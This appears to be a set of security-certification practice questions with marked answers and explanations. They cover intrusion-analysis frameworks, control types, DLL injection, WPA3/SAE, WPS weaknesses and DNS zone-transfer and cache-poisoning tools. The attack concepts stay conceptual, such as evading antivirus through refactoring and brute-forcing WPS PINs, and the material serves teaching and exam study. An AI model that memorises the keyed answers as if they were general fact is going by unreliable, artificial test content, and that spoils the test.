[]The Diamond Model of Intrusion Analysis (The Diamond Model of Intrusion Analysis is a framework that analyzes intrusion events by examining relationships between four core features and can be utilized as an alternative to the cyber kill chain.) []MITRE ATT&CK (The MITRE ATT&CK framework stands for Adversarial Tactics, Techniques, and Common Knowledge. It is a database of known TTPs (tactics, techniques, procedures) that can function as an alternative to the cyber kill chain.)

A security expert uses a technical approach to configure a detective control to monitor a server. Review the descriptions and determine which controls the expert implements. (Select all that apply.) []Psychologically discourages an attacker []The control is implemented as a system []Implemented primarily by people []Records attempts at intrusion

[]The control is implemented as a system (A technical control is implemented as a system (hardware, software, or firmware). For example, firewalls, anti-virus software, and OS access control models are technical controls.)

Security admins are evaluating Windows server vulnerabilities related to Dynamic Link Library (DLL) injections. Modern applications are running on these Windows servers. How would an attacker exploit these vulnerabilities? (Select all that apply.) []Use malware with administrator privilege. []Evade detection through refactoring. []Navigate laterally using pass the hash. []Enable legacy mode through shimming.

[]Use malware with administrator privilege. (Dynamic Link Library (DLL) injection is deployed with malware that is already operating on the system with local administrator or system privileges.) []Evade detection through refactoring. (The malware must evade detection by anti-virus to be successful. This can be done through code refactoring which means the code performs the same function by using different methods, such as changing its signature.)

Which wireless configuration provides the most up-to-date and secure way of connecting wireless devices to an office or home network? (Select all that apply.) []EAP-TTLS []WPA3 []SAE []PEAP

[]WPA3 (Wi-Fi Protected Access 3 (WPA3) is the most up-to-date wireless specification and addresses known weaknesses of WPA2, including offline dictionary attacks against the pre-shared key.) []SAE (Simultaneous Authentication of Equals (SAE) is the WPA3-Personal authentication method. It replaces WPA2's pre-shared key (PSK) exchange with a Diffie-Hellman based protocol (Dragonfly), so a captured handshake no longer allows offline password guessing; the 4-way handshake still runs afterward to derive session keys.)

While assisting a customer over the phone to connect a laptop to a new wireless router, the user suddenly reports it is connected. Upon further inquiry into how the connection occurred, the user stated they pushed a circular button. Analyze the situation and determine which button the user pressed, and how it functions. (Select all that apply.) []WPS []8-character PIN []Authentication server []Wireless password

[]WPS (WPS, or Wi-Fi Protected Setup, works with compatible devices such as printers: the WPS button is pushed on the router and the device to establish a connection.) []8-character PIN (Activating WPS on the wireless router and the adapter at the same time associates the devices using an 8-digit PIN, then associates the adapter with the access point using WPA2. The system generates a random Service Set Identifier (SSID) and pre-shared key (PSK). The PIN method is a known weakness: the PIN is validated in two halves, which reduces the search space enough for online brute force, so WPS should be disabled when it is not needed.)

Select the tools with which an attacker can identify misconfigured DNS servers with which a zone transfer can be performed, compromising the records of all hosts in a domain. (Select all that apply.) []tcpdump []dig []nslookup/dig []curl

[]dig (An attacker may test a network using dig to find out whether the DNS service is misconfigured, by requesting a zone transfer (an AXFR query) against each authoritative server for the domain.) []nslookup/dig (On Windows, nslookup can query name records for a given domain through a particular DNS resolver and request the same zone transfer; dig is the equivalent on Linux.)

An Information Security Manager working for an ISP has discovered that an attacker has poisoned the DNS server cache by spamming it with recursive queries. Predict what tools the manager might use to discover whether the attacker has inserted any false records. (Select all that apply.) []tcpreplay []nslookup/dig []dnsenum []Memdump

[]nslookup/dig (nslookup, or dig on Linux, can query the name records and the cached records held by a server to discover whether an attacker has inserted any false records.) []dnsenum (dnsenum packages a number of tests into a single run, including host information and name records, and can try to work out the IP address ranges a domain uses.)
